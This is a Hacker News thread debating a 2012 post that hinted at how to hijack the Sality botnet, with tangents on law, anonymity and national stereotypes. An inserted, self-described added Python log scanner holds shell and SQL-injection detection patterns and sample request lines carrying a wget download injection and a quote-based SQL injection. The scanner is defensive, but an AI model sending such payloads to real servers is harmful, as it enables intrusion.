Please do not take down the Sality botnet (seclists.org)
575 points by wglb on March 28, 2012 | 142 comments



The guy takes all the time to put this together, write this up, and is perfectly ok with the outcome, but instead of going to a coffee shop and doing this himself, he spends a lengthy amount of time writing up instructions and giving the criminals a chance to fix their injection problems before someone can take down the botnet.

Baffling.

Not only that, but this guy seems to know what he's doing and instead of someone who knows what they're doing completing the task, he's willing to watch script kids bork the whole thing, or run the risk of russians (or others taking over the whole network and hardening it)


To prove a point- the current system of law is completely broken when it comes to dealing with malicious software. Law enforcement is a joke, to the point where reporting a botnet c&c located right in the US to the FBI will result in a six week runaround before you finally get a phone call from someone in the right department, and this is assuming you've dealt with them enough to be on their quick list. Guess who moved their servers four weeks ago?

Actually taking matters into your own hands, as an individual or a company, opens you up to a ridiculous level of liability and is probably illegal in a number of cases. Hell, even analyzing malicious software itself has the potential to be illegal due to draconian copyright laws (fortunately most malware authors aren't willing to claim ownership of their software, so this isn't an active issue). Even once all that is done, more malware will be written, and probably by the same people since it's not like taking the botnet down actually puts people behind bars.

This isn't to say the bad guys are winning- I may be a bit biased (I work for Malwarebytes, although this post is my own rambling mess), but a lot of technological strides are being made. There is still a fair bit of frustration out there with law enforcement though, as they continue to impose draconian and Orwellian systems but haven't implemented the low hanging fruit in policy changes for actually dealing with this crap.


But download a Justin Bieber album and you get sued for $50k in a matter of days. System works perfectly!


The good thing is Congress is having hearings on cybersecurity, so clearly this will be fixed very soon.


Yeah. Can't wait to have pipes outlawed. Will have an excuse to drive to California when I need a new sink in the house.


I apologize in advance for the tone, but as a Russian I have a question - are you racist?

Since Sergey Brin and Milla Jovovich are "russians", do you imply that Google and Hollywood are part of this botnet?

The most famous hacker is Kevin Mitnick [american] and most recent hackers charged/arrested by FBI are also american citizens.

Why don't you change "russians" to "americans"? Or maybe "new_zealanders" [Kim dot com]? Or maybe "brits" [UK kid, extradited recently to US on copyright violation charges].

If you would change to "americans", I just wonder whether some people will feel offended and how many?


I agree that it is a prejudice and should be avoided, but it's not completely groundless:

    According to industry analyses, Russia accounts for about 35 percent of
    global cybercrime revenue, or between $2.5 and $3.7 billion. That’s wildly 
    out of proportion with the country’s share of the global information 
    technology market (which is around 1 percent).
http://themoscownews.com/siloviks_scoundrels/20111121/189221...

It's not that Russians are inherently cybercriminals, but the country does seem to be currently suffering from conditions that help it foster.


thank you :-)

Just to point to a couple of facts:

1. From the same article:

"Why does every hacking and cyberscam story – real or fictional – seem to have a Russia connection?

In part, it is prejudice and laziness. The stereotype of the Russian hacker has become such a common media trope that it gets recycled again and again. It also offers a handy update for those looking for new ways to perpetuate the ‘Russian threat.’"

2. Following the article's line on the FSB - does anyone know who hacked the PCs of Iran's nuke facility? If we judge by who had a reason - the US - we shall assume that the US has the same or an even better hacker team than Russia [very clever OS hack that resulted in hardware malfunction at the nuke plant, thus significantly reducing its output - was covered in 2011].

3. I suspect that most 'industry analysis' is funded by government agencies, directly or indirectly. So if the conclusion of 'industry analysis' were that the US accounts for 35 or 65 percent of global cybercrime revenue, then the next question would be - what the hell are the various government agencies doing and how effectively do they spend government/taxpayers' money?

4. From the same article:

"However, a more basic answer is that a disproportionate number of Russians have worldclass math and computers skills, yet not the kind of jobs to use them legitimately. Although many firms in the industry are based in Russia, or else hire Russians, there is a pool of skilled but under-employed programmers who embrace the hacker world for fun, out of disillusion, or for profit."

Can anyone show me a skilled but under-employed programmer in Russia?

"Skilled but under-employed programmer in Russia" is like Bigfoot [also known as sasquatch] - everyone has heard about him/her, but no one has seen one. It is a legend...

But of course there are russians, americans, germans, brits, and other nations, which do quite some harm. I just do not think there is a legitimate way to define the winner.

Sorry for off-topic rambling, probably due to habit of enjoying fact-based debate, which resulted from my days in finance ;-))


It looks like most people have already responded.

While my comment was poorly worded, statistically the majority of large botnets like Coreflood, Storm, BredoLab, Rustock, Kelihos are of Russian origin. Even the botnet we are discussing was first seen in Russia.

To comment on a couple of your points

2 - With Stuxnet, I think everyone agrees that US/Israel is to blame. The Russian connection is made because aside from the Iranians, the Russians are the only ones that had access to the facility, and they built the place. A Russian spy is a more likely culprit than a US-Iranian scientist double-agent sabotaging his own facility with results that could kill all of his co-workers.

4- No-one is talking under-employed. These criminals make more money than they ever would at any other job selling access to their botnet, advertising, spamming, installing fake virus software, stealing credit cards, etc. etc.

This gives rise to entities like the Russian Business Network (RBN)

Anyway, I meant no offense; if only Americans or Brits were clever enough to create a similar profile or stereotype, but I think some script kids guessing passwords pales in comparison to outsmarting the world's largest software vendors and security researchers.


Appreciate your intent.

You are correct on #4. I've heard some stories about hackers storing piles of cash under the couch [this case was in Ukraine], made from cracking banks/ATMs. Definitely, black activities are much more profitable. But I do not think that [in real life] those that crack get most of the money, with few exceptions. The biggest pile usually goes to those who organize or cover (underworld Board/CEO equivalent).

However, the start-up fever, which started in Russia appr. 1-1.5 years ago, is getting traction, as well as tech industry. This provides more opportunities and better risk/reward ratio and shall result in that more and more people will be moving to bright side.

And yep, the smart brain has no nationality.


> "Skilled but under-employed programmer in Russia" is like Bigfoot [also known as sasquatch] - everyone has heard about him/her, but no one has seen one. It is a legend...

Well, Group-IB (a Russian computer security company) seems to disagree:

    In Russia the situation is additionally worsen by a great amount of 
    technical universities graduates and by unstable home economy
    situation as the result of which the mentioned specialists cannot
    find highly paid legal income. 
https://docs.google.com/viewer?a=v&q=cache:Wgm5sdanNDgJ:...

I don't know where they get the data from, though.

> But of course there are russians, americans, germans, brits, and other nations, which do quite some harm. I just do not think there is a legitimate way to define the winner.

Sure, it's still a prejudice, I was just pointing out it's not completely irrational.


True, but sometimes perceptions become self-fulfilling prophecies :-(


> "Skilled but under-employed programmer in Russia" is like Bigfoot [also known as sasquatch] - everyone has heard about him/her, but no one has seen one. It is a legend...

Pretty good observation. I think most people are operating on 10-12 year old data when they think that. They think "fall of the Soviet Union" with now hungry scientists slowly turning to the dark side to become less hungry mad scientists who will inflict pain and suffering upon us all.


Perceptions are funny thing [except when from yr boss]...

I recall that in 1997-1998, when I was helping Coca-Cola establish plant in Vladivostok (Far East near Japan, 0.5 mil population), some people were concerned to go there because of tigers and bears wandering in the streets...


Yes, when I was setting up a server I eventually had to apply a separate and more draconian set of firewall rules to IP addresses in Russia and China to avoid my logs just filling up with junk: failed logins, attempts to access shady looking URLs which did not exist and HTTP requests filled with fragments of shell or SQL script.

To be fair I'm sure this only represents a minority of the people in these countries but perhaps it is just that it is more lucrative there.

I imagine it's quite hard to earn a decent living in the west just by breaking into a few servers and sending out a bit of spam, in Russia it probably looks like an attractive get rich quick for anyone with tech skills.
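The log noise the comment above describes (failed logins, probes for URLs that don't exist, request lines carrying shell or SQL fragments) is easy to triage mechanically before deciding what deserves a firewall rule. The scanner below is an added example, not code from this thread or from any project mentioned in it. It classifies constructed Apache/nginx "combined" format access-log lines, aggregates findings per source IP, and flags the addresses that sent an injection fragment or repeatedly probed non-existent URLs. It aggregates per IP rather than per country, because the per-country rule set the commenter ended up with needs a geolocation lookup that this example deliberately leaves out; the regular expressions are illustrative assumptions, not an exhaustive signature set.

```python
"""Triage web-server access-log noise: classify each request line, then
aggregate per source IP so the worst offenders can be handed to a firewall
rule set. The log lines at the bottom are constructed for this example."""
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Apache/nginx "combined" format:
#   ip - - [timestamp] "METHOD path HTTP/x" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+'
)

# Illustrative fragments that have no business in a request to an ordinary
# web site. These are assumptions for the example, not a complete rule set.
SHELL_PATTERNS = [
    r'/bin/(?:ba)?sh', r'\bwget\s', r'\bcurl\s',
    r';\s*(?:cat|id|uname)\b', r'\|\s*sh\b',
]
SQL_PATTERNS = [
    r"'\s*or\s+'?1'?\s*=\s*'?1", r'\bunion\s+(?:all\s+)?select\b',
    r'\bsleep\s*\(', r'\bdrop\s+table\b',
]
SHELL_RE = re.compile('|'.join(SHELL_PATTERNS), re.IGNORECASE)
SQL_RE = re.compile('|'.join(SQL_PATTERNS), re.IGNORECASE)


def classify(line):
    """Return (ip, tag) for one log line; tag is "shell", "sql", "probe" or None.
    Lines that do not parse yield (None, None)."""
    m = LOG_RE.match(line)
    if not m:
        return None, None
    ip = m.group('ip')
    # Decode %-escapes once so "%27%20OR%20" style payloads are inspected too.
    req = unquote(m.group('req'))
    if SHELL_RE.search(req):
        return ip, 'shell'
    if SQL_RE.search(req):
        return ip, 'sql'
    if m.group('status') == '404':
        return ip, 'probe'
    return ip, None


def summarize(lines, probe_threshold=3):
    """Aggregate per-IP findings. An IP is flagged when it sent any shell or
    SQL fragment, or at least probe_threshold requests for non-existent URLs.
    Returns ({ip: {tag: count}}, sorted list of flagged IPs)."""
    hits = defaultdict(Counter)
    for line in lines:
        ip, tag = classify(line)
        if ip and tag:
            hits[ip][tag] += 1
    flagged = sorted(
        ip for ip, c in hits.items()
        if c['shell'] or c['sql'] or c['probe'] >= probe_threshold
    )
    return {ip: dict(c) for ip, c in hits.items()}, flagged


# Constructed sample log (documentation-range addresses, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [28/Mar/2012:10:00:01 +0000] "GET /wp-login.php HTTP/1.1" 404 162 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Mar/2012:10:00:02 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 162 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Mar/2012:10:00:03 +0000] "GET /admin.php HTTP/1.1" 404 162 "-" "Mozilla/5.0"
198.51.100.9 - - [28/Mar/2012:10:01:00 +0000] "GET /cgi-bin/test.cgi?cmd=;wget%20http://example.invalid/x HTTP/1.1" 403 0 "-" "-"
198.51.100.10 - - [28/Mar/2012:10:01:05 +0000] "GET /item.php?id=1%27%20OR%20%271%27=%271 HTTP/1.1" 200 512 "-" "-"
192.0.2.44 - - [28/Mar/2012:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.44 - - [28/Mar/2012:10:02:10 +0000] "GET /favicon.ico HTTP/1.1" 404 162 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    per_ip, flagged = summarize(SAMPLE_LOG.splitlines())
    for ip, counts in sorted(per_ip.items()):
        print(f"{ip:16} {counts}")
    print("flagged for firewall review:", ", ".join(flagged))
```

Run against the constructed sample, the three-time 404 prober and the two addresses carrying shell and SQL fragments are flagged, while the ordinary client with a single missing favicon is not; the threshold is the knob that separates a scanner from a browser asking for one file you never published.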


> in Russia it probably looks like an attractive get rich quick for anyone with tech skills.

It is attractive. But again this is about risk/reward ratio. With increase of risk/complexity and other, legal, opportunities more people shall switch... I think...


>"in Russia it probably looks like an attractive get rich quick for anyone with tech skills."

See also: 419 boys

It's not just Russia.


Nope, try buying something online with a Nigerian IP address.


Based on that statistic it is significantly more likely that any particular cyber crime (or accurately dollar raised by cyber crime) is nothing to do with Russia than is and yet still this is a justification?

That article doesn't even provide enough information to say that if you had to pick a single country of origin then it's more likely to be Russia than anywhere else.

In terms of generalising based on that sort of thing though, would you similarly justify a suggestion that a drug deal was down to a young black male on the grounds that proportionately young black males in the USA are more likely to be convicted of such offences than young white males? Or would you see that as a sweeping and unhelpful generalisation that tars a whole group based on the activities of a minority?


Apparently you forgot to read the first line of my post. I'm not justifying anything, I'm explaining why the prejudice exists, and that it's not necessarily due to racism.


I get that, I'm trying to explain why it's not a reasonable basis for prejudice.


Of course it isn't, if it was it wouldn't be prejudice.


It's not "due to" racism, it is racism. Prejudice based on ethnicity or nation of origin is racism.


No. "Racism is the belief that inherent different traits in human racial groups justify discrimination".

If it's based on the current social or economical situation of Russia, it's prejudice, but not racism. Remember that Russians are "citizens of Russia", not a particular ethnic group.


I applaud your efforts at education!

I observe however that there is an emergent definition of 'racism' which is quite a bit more broad than yours.

Basically it is this: "Assuming specific or stereotypical attributes about an individual or group, based on that individual or group's membership in a definable group."

This removes the typical restriction that it involve 'race specific traits', so things like 'Bankers are greedy criminals' or 'Christians are fascists' get reflected back as variations on the 'racist' meme. Whenever that group membership nominally includes race it's considered racist by people who share that racial attribute.

Even the discussion we're having (and as an operations guy I see a lot of bad actors whose IPs originate in countries that were former parts of the USSR) we have to be careful to disentangle accusations of people of a region being bad, and regions which host infrastructure which is available to everyone, being used for bad. The Internet does many things and one of those things is create 'telecommuting criminals' who may easily be living in New Hampshire but hosting their C&C servers at a friendly ISP or EC2 equivalent in the Ukraine.

[edit typos]


Good point re 'telecommuting criminals'.

I presume it is inherently and practically more difficult to investigate identity of someone renting servers in US vs Russia, Ukraine or China, in part because of language, legal system and political differences.


Race does refer to geographic origin (among other things.) It does not include career or religion. I don't think that is related to what is being discussed at all.


Lots of racism emerges partially as a result of some statistical basis in current social or economic situations that for whatever reason correlate to an ethnic group or nation of origin. (And racism is not solely about ethnic groups, it's also about nations of origin -- ethnic groups are just one of the classifications of humans that are considered "race", geographic ancestry is another.)

It's not racism to recognize these statistical facts. Racism is when we have prejudice based on them. It's when we slander an entire ethnic group or nation of origin based on the actions of a few of them. This is not justified just because there is more cybercrime in Russia than elsewhere: there is cybercrime everywhere, and the vast majority of Russians are not cybercriminals.

It's racism to say we "run the risk of russians" when we mean we run the risk of malevolent cybercriminals. The two terms are not interchangeable. We don't say you "run the risk of blacks" when we mean you might get mugged in downtown LA even if we believe that more muggings in downtown LA come from blacks than other ethnic groups, nor do we say you "run the risk of whites" when we mean you might get killed by a serial killer as you're walking to your car in an empty garage at night, even if we think perpetrators of such crimes are more likely white than anything else.


I think it depends on what one attributes the statistical fact to; it's only racism if we consider it inherent to the group. If we consider that to be a result of a particular condition that happens to affect a certain group at this point in time, and that any other group would have the same problem if subject to the same condition, I don't see how that is racism.

I think your examples are clear prejudice (and no, I wouldn't say them), but they may or may not be racism.


I suppose I just don't see what would motivate someone to slander an entire group of people based on the actions of a few. If someone is worried about cybercrime, they should say so rather than substituting "Russian" as a synonym for cybercriminal. To me that implies that cybercrime is an inherently Russian activity. Perhaps I am too quick to read racism against Russians into such an inflammatory use of the word "Russian" due to the amount of racial discrimination I have seen against Russian users while working in the game industry, where it is not uncommon to dismiss Russian gamers as probably a pirate or probably a hacker and to refuse them a level of support that would be provided to a person with a different accent or last name.


(Repeated from my reply to something else)

The UN's definition of racial discrimination:

"the term "racial discrimination" shall mean any distinction, exclusion, restriction, or preference based on race, colour, descent, or national or ethnic origin that has the purpose or effect of nullifying or impairing the recognition, enjoyment or exercise, on an equal footing, of human rights and fundamental freedoms in the political, economic, social, cultural or any other field of public life."

I don't know what the US legal definition is (though I'm guessing it's similar) but in the UK discrimination based on country of origin would count as racism.


I think you're playing the race card and ignoring the facts. Which is pretty lame.

As a Brit, I fully appreciate and understand why some people in the world hate all Britons. We've done some bad things as a nation in recent years and people have a right to tar us all with the same brush. I understand why it would be unsafe for me to walk the streets of Kabul or Baghdad. If any Brit has a problem with the way other people look at them, it's their job as a citizen in a democracy to effect the change they want to see in people's attitude towards this country and its people.

Except when it's the French. There's no pleasing those cheese eating surrender monkeys.


> As a brit, I fully appreciate and understand why some people in the world hate all britons. We've done some bad things as a nation in recent years and people have a right to tar us all with the same brush.

Well that's cute, but I disagree. I'm Dutch, we've done some rather bad things in our colonial times, yet it is not okay for Indonesians or South Africans to hate all Dutch. Similarly it is NOT okay for Dutch people to hate all Germans just because they invaded us in 40-45 (WW2), because they took our bikes or because they tend to defeat us in international soccer games.

> If any Brit has a problem with the way other people look at them, it's their job as a citizen in a democracy to effect the change they want to see in people's attitude towards this country and its people.

I'd agree with you on that point if only you weren't highly overestimating the level of influence "any Brit" has on these matters, compared to how much "some Brits" have.

Same for any democracy. Even those mythical ones that work. I'm responsible for my own actions, not for those of some bigshot that claims to represent "me" (one individual in a group of several million of that claim).

If you feel that's not right or self-centred and I should do better, I'll try to take responsibility for my own actions extra hard, but I refuse to take on those of some idiot I hardly have any control over. Best I can do with my little vote is to not vote for Geert Wilders--but as you may or may not have noticed, it didn't help much. So am I to feel responsible for that turdmongler? Fuck no! Yet will I discreetly defecate in the kitchen or bathroom sink of anyone I encounter that appears to subscribe to Wilders' moronic ideas? You can count on it, and that's all the responsibility I will take.

> Except when it's the French. There's no pleasing those cheese eating surrender monkeys.

hur hur hur :-/

I'm all for a bit more humorous light-hearted poking on HN, but I'd rather do without crap like this. Made it real hard to read The Black Swan when Taleb continuously did the same, too.


What exactly is lame?

Pointing to possible misuse of race/nationality angle?

I do not think so.

Re > it's their job as a citizen in a democracy to effect the change they want to see in people's attitude towards this country and its people.

I believe that my job is to take care of my family and myself, because no one else, and no government, will do this.


That's the difference between being a participatory citizen and an inhabitant.


I work in information security, and I can give you a rough breakdown on botnet sites we've run into over the last year. (rough numbers)

25% have been Chinese (or linked to Chinese hackers, but using distributed hosting of hijacked servers around the world)

5% have been US-based.

10% have been Indian.

10% have been "other", including Canada/Mexico/Latin America, Africa, and Western Europe (like the German(?) Conficker worm)

A full 50% have been linked to the Russian Federation (and other former Soviet countries).

Why is this? Everyone has their theories, but mine is the combination of

1. Russia (and Eastern Europe) is a huge area.

2. Russian mafia really ramped up their cybercrime efforts after 1991 when the Soviet Union was retired.

3. Enforcement of cybercrime laws in Russia is lacking in comparison to Western nations, for various reasons.

Many other countries, including the US, have their own hackers and cybercrime groups. China and Russia are much, much more effective, though, and it's fashionable to hate on "commies" in the Western media.


Another reason (4) is that quite a lot of people [majority] download audio/video content and install cracked software on their Windows! home PCs.

I agree that external environment provided much more fertile ground for criminal activities [incl tech] in former USSR.

The key words are "fashionable" and "Western media". We all can observe the influence of media on people's perceptions of events, countries, nationalities...


You forgot to mention that the level of technical education in Russia is quite high. Combined with the mediocre quality of Russian business managers it produces an oversupply of tech specialists. That in turn fuels rapid development of the botnet ecosystem.


It was clumsily worded but I think we all know he didn't mean to imply that all of Russia was running botnets; he was alluding to Russian organized crime.


Indeed. The word criminals would be more accurate and less pejorative.


"Russian" is pejorative?


Sorry, my intent was to suggest that the sentence was pejorative towards Russians.

I may have been unclear and reading up I may have misused the word - can pejorative apply to a sentence or just to a word or phrase?


Yeah, I was just not sure if you were using it on the whole comment or making a silly joke. And I think it's a word only, at least in a language I speak naturally. That is not English however.


Any word can be a pejorative if used as such, you hacker.


Fun though it always is to accuse people of racism.

"The W32.Sality family of threats has been around for some time as the first versions surfaced in 2003 and may have originated in Russia"

http://www.symantec.com/security_response/writeup.jsp?docid=...


To me it is clear that he meant Russian hackers (as it would have been if it had say Chinese) and I doubt anybody else is confused over this. Given that, writing hackers was redundant and should be dropped.


Since when is "Russian" a race?


From the perspective of racism (which is the context here) it's perfectly valid.

The UN's definition of racial discrimination:

"the term "racial discrimination" shall mean any distinction, exclusion, restriction, or preference based on race, colour, descent, or national or ethnic origin that has the purpose or effect of nullifying or impairing the recognition, enjoyment or exercise, on an equal footing, of human rights and fundamental freedoms in the political, economic, social, cultural or any other field of public life."


I had a colleague who was from the Ukraine, and I once referred to him as Ukrainian, and he stiffly responded, "I am Russian." From that, I assumed that some people consider it an ethnic group independent of the nation.


A lot of people from Eastern Europe are very sensitive about that sort of thing; Russia's domination of the USSR and various brutalities are still fresh in memory, and besides, referring to any Eastern European as a Russian is akin to calling someone from Guatemala as a Mexican. Some people are more sensitive about it than others. (I was born in Russia, and don't particularly care, but I'm aware of other people's sensitivities.)

This happens in other parts of the world, too, of course. I once asked a girl in college if she was from India; she gave me a hateful death stare and coldly declared that she was from Bangladesh.


Which brings up another quirk of humanity, which is we tend to hate the ethnic group that is the most similar to our own. Simply, you hate your neighbor, you don't hate someone on the other side of the world you've never interacted with.

There certainly are many instances of people hating ethnicities very dissimilar from them, but that happens after people from different parts of the world migrate close to each other.


I think the generalized term for that is "the narcissism of small differences".


Well, sure. Your neighbor is the one who waits an extra week to mow his lawn, which looks bad, and drags down everyone's property values. Your neighbor is the one whose dog pooped in your yard that one time.

I suspect that proximity has a great deal more to do with it than similarity. If your neighbor is actually significantly different than you (ugh, the weird smells from the strange food those people eat!) I would think it makes it even worse.


Russian refers to anything related to Russia, including:

* Russians (russkiye), an ethnic group of the East Slavic peoples, primarily living in Russia and neighboring countries (where they are also known as Ruthenians or by other names)

</wikipedia>

Close enough?


But I bet you never request your money back after an action movie depicts a bad guy in the desert wearing a turban, right?

Yeah, I thought so.


What makes you think that he didn't post this and then immediately do it himself? It's called plausible deniability.


This actually will make it harder for him, as he just defined motive and means for the prosecution.


Only if the act itself were traceable to him. If he's the only one who knows how to do it, and it happens, then "of course" he did it. If everyone knows how to do it, who knows who might have been responsible?


Who should he tell?

If any of the victims are in the UK he could try the Police Central e-crime Unit. (It's all 'cyber', a word which feels strangely quaint.)

(http://www.met.police.uk/pceu/)

Or he could try Microsoft's digital crime unit.

(http://www.microsoft.com/government/ww/safety-defense/initia...)

Any other contact addresses?


I imagine if you do it from a coffee shop or similar public place, then there is a good chance of being caught on CCTV. Whether the authorities will go after someone to that degree, given what they have potentially done, is another matter.


Exactly. It seems to be a point that a lot of people forget. A lot of people don't fully trust the Internet security tools, such as TOR, for anonymity. So, they try to add a layer of what is essentially physical security by using an Internet connection that doesn't track back to them. However, a lot of times people don't fully consider that at that point you must now not only secure your Internet security but physical security as well. I.e. not be seen.

I'm not saying it is a bad idea to want to add an extra layer of security/anonymity, but it actually has to be done right. If investigators trace it back to the coffee shop and see on the CCTV that you're the only one sitting there using a laptop for the entire time the attack took place you're screwed.

Interestingly enough, all the ways to actually add that layer of physical security are potentially illegal. (depending on local laws) Obviously, the laws can vary a lot, but in a lot of places the methods a person would use to hide themselves are considered unlawful access.

Take the coffee shop for example, instead of entering the coffee shop you sit outside it. If it doesn't have cameras outside, the businesses around it very well might have one that can see you, and then there are also the people that see you. (witnesses) Okay then, long range antenna, right? Wrong, still illegal in some places. Even though it is an unsecured wifi that is meant for people to connect to it, it is meant for customers. That means that you either have to go in and buy a coffee (which shows on camera that you were in the area) or to have previously asked permission to use it which means that someone in the coffee shop must know who you are to have given you permission. This caveat actually applies to the parking lot situation too and people really have been charged before for accessing a coffee shop's wifi from the parking lot without actually going in so this isn't just a thought exercise.

Generally, if you're doing something online illegal enough to be investigated that fully, illegally accessing some coffee shop's connection is the least of your problems. There are legitimate reasons to want total anonymity though, such as whistle-blowers or individuals living in certain countries. If you're going to try for that level of anonymity it is important to know the local laws and make sure that whatever you're trying to be anonymous about is worth potentially breaking that law if it exists.


I also don't understand how he expects that the botnet won't be taken over or hardened based on the results he published before it gets shut.

I did try to download the images linked in the post; as I write, not a single one has been replaced with his removal utility, so judging by just these few links there's no evidence that somebody has already decided to follow his recipe.

I'd really like to read some news writeup in a few days.


Not really baffling, just obviously sarcasm + he couldn't legally say for anyone to use the tools.


I am reminded of the "wine blocks" sold (legally!) during the prohibition, which came with the following warning:

After dissolving the brick in a gallon of water, do not place the liquid in a jug away in the cupboard for twenty days, because then it would turn into wine.

http://en.wikipedia.org/wiki/Prohibition_in_the_United_State...


Not unheard of at all. In dry countries today you'll find all the ingredients in one spot of the grocery store to brew your own beer/liquor/wine, but nobody really says it's for brewing; they're just conveniently put together.


I can't help but think that must have tasted terrible!


It probably does. In Quebec, wine can only be imported and sold in state-controlled liquor stores.

As a loophole, dehydrated wine is imported, rehydrated, bottled, and sold in corner stores ("depanneurs"). It tastes rank.


Would you be able to provide a reference for this? As a Quebecer, this is of interest to me.


California, always one step ahead on the recreational stuff.


Reading README in the linked zip file, inside is, first, an executable which is a QBFC (http://www.abyssmedia.com/quickbfc) packaged and slightly modified version of AVG's Sality Removal Tool (http://free.avg.com/us-en/remove-sality) to automate the removal of the Sality virus. Then, there is the encrypted version of the same executable, so it will run properly when downloaded by the Sality virus. And finally, there's a simple Python script that queries super peers from a bootstrap list for the most recent URL pack pushed to the Sality P2P network.


I would love to hear a lawyer's opinion on whether the OP has any legal case whatsoever if his "not suggestions" are ever used, his identity is identified, and someone decides they want to throw the book at him.

Basically, if some DA decides this is modern day vigilantism, a step removed - could the OP ever defend himself in court?


IAAL. You know how lawyers always write "I am not your lawyer. This is not legal advice. Consult a lawyer in your jurisdiction."? That's for several good reasons, partly that we like being special, but also because no one could really answer this without doing legal research in the jurisdiction where the OP was charged. The answer will vary not only from country to country but state to state, and could depend on all kinds of specifics we don't know.

With that said, the law is basically a big virtual machine that runs on metaphors and rhetoric, kind of like the IE6 html engine.[1] So if I don't know the answer, I look for a metaphor where I have a better intuition.

In this case, the post reads kind of like: "hey, we all know that bar across the street is a front for organized crime. The law doesn't allow me to ask you to burn it down. So I'm just going to leave this molotov cocktail I assembled on the street here, and tell you not to burn down that bar across the street, OK? Also I've taken careful steps to conceal my identity. Laters."

So my gut is, yeah, in the hypothetical world where the OP screwed up and a million people lost data on their computers, and the FBI went ahead and tracked the OP down and prosecuted, they would be guilty as heck. This is more than just suggesting that it would be nice if someone did illegal things (which could be problematic itself, if the speaker intended and expected the suggestion to be followed), but actually compiling and providing tools and instructions to make it happen.

But if you understand the situation differently, and can offer a better metaphor where they sound innocent, then the answer could change. For example, how about: "hey, that guy is having a manic episode and about to start juggling chainsaws. The law doesn't allow me to suggest you use this tranq gun and shoot him. So I'll just leave it here." Or how about, "these parents are bringing back childhood diseases that have been gone for decades, because charlatans have scared them into avoiding vaccinations. The law doesn't allow me to suggest you vaccinate the kids yourself, so I'll just leave this vaccination candy here ..." OK, that one's definitely illegal, but interesting to contemplate. It's a fun game.

The thing to be careful about, though, is to disconnect what you want to be true from what is actually true. Like in this case, maybe you want it to be true that the law lets you hack someone's computer to protect them, the same way it (maybe) lets you stun the manic guy. But if you know that part's not true, then don't fudge the metaphor to get to the outcome you want.

And I am not your lawyer, and this is not legal advice, and you should consult a lawyer in your jurisdiction.

--

[1] This sounds bad, but I actually think it's a pretty reasonable way to run a legal system. We define a fair system as one that treats like cases alike and different cases different. So the way to make that happen is either to write code in advance that handles every edge case -- which if you've met human beings is hilariously impossible -- or to analogize every new situation to the ones before, and try to fit it in where it belongs. It's a fun problem.


...Law is basically a big virtual machine that runs on metaphors and rhetoric, kind of like the IE6 html engine.

Best quote I've read all year. Also makes a ton of sense when put like that, so thanks.


I think the OP might be in difficulties in that event (totally not a lawyer, just guessing).

But perhaps the OP felt it was less risky this way not just for legal reasons, but because it's easier to send one email anonymously than to carry out the whole operation without being traced.

Or maybe he or she had other stuff to do.


Not a lawyer. But this would never come to pass - no DA would have the brains let alone the skill or political will to prosecute. Also, seems like a freedom of speech issue. Otherwise it would be difficult for educators to discuss computer security. In fact, I'm pretty sure he could even do away with all of the "non-suggestion" text and still be fine.

If I say, "I think you should hack website X, humanity will be better off for it" that's just my opinion. I can even say, "I think you should empty all of Goldman Sachs' bank accounts and use the proceeds to buy up endangered rain forest land in Brazil." As long as I'm not materially facilitating the commission of the crime, I'm just another guy on the internet with an opinion.

Edit: After reviewing http://en.wikipedia.org/wiki/Freedom_of_speech_by_country#ci... I'm coming to the conclusion that the above is pretty far from accurate in any country. Apparently freedom of speech has been under serious assault for decades. Which is sort of sickening, but also a fact of life.


Law student. These sorts of situations have been considered by the people that write criminal laws.

If you recommend a crime to someone and then they do it then you're a party to that offence (http://laws-lois.justice.gc.ca/eng/acts/C-46/page-6.html#h-5 [Canadian Criminal Code, but I assume US is quite similar on this]).

There are a variety of ways to become a party to a crime, and then you're as guilty as the rest of 'em.


Dear Everyone reading this, commit Fraud, Blackmail, Murder, Insider Trading, Jaywalking and Possession. Now. Go. Do it!


The U.S. criminal code is not like the Canadian Criminal Code. Also, I suggest you reread the statute. By the plain language of the CCC, it is not enough to recommend that someone commit a crime, you must actually counsel them in how to do it (i.e., provide advice).


I don't see how TFA doesn't fall under counsel. He gives you a step by step process.


Providing the files needed is a little bit more in terms of actively participating than just saying "wouldn't it be nice."


There is a huge difference between "I think you should hack this website." and "I think you should use this method I'm providing to hack this website."


I agree that a DA would be highly unlikely to prosecute as it would take a large amount of effort for little gain, but this clearly fits the definition of conspiracy. There is no requirement that conspirators know each other, and posting the files required seems like an overt step.


In the U.S., by definition the conspirators must agree to commit a crime. Thus, they must know each other--not in a personal sense, but they must actually know that there are other participants and agree to act in concert with those other participants.


Exactly. This is an open offer, and there is no agreement until someone actually accepts the open offer.


Actual lawyer.

He's generally right, in the U.S. at least. Suggesting that someone commit an illegal act does not rise to the level of conspiracy. You have to actually do something meaningful to support the criminal effort to be charged with conspiracy.

In certain circumstances, incitement can be a crime, but the threshold for that crime is very high.


He did provide the tools and instructions, to be fair. I'm not sure if that counts as 'something meaningful', but it's something more than just suggesting, anyway.


He's provided some tools and instructions but he seems to have been fairly careful not to provide everything you'd need - there would still need to be a not inconsiderable application of skill and effort from someone.

Essentially he's not loading the gun, putting it in someone's hand and pointing it just waiting for them to squeeze the trigger. My reading is it's closer to him saying where you might find someone you want to shoot and pointing out the gun store.


> but the threshold for that crime is very high

What exactly does that mean? What is the line between "incitement" and "suggesting a crime"?


Whatever a jury thinks


... and an appeals court upholds.


So why can't those nice guys from the FBI go and do it already? It's so easy to replace sites when piracy is involved...


Victims of piracy have better lobbyists than the victims of identity theft.


Couldn't have said it better myself.


They simply can't. This is very different from closing down some "piracy" sites. In this case they need to mess with data on your computer. Do you want the FBI to have a legal way to read, modify or destroy data on your computer? Even if you want that (which I don't believe), there is no way that would work on an international scale.

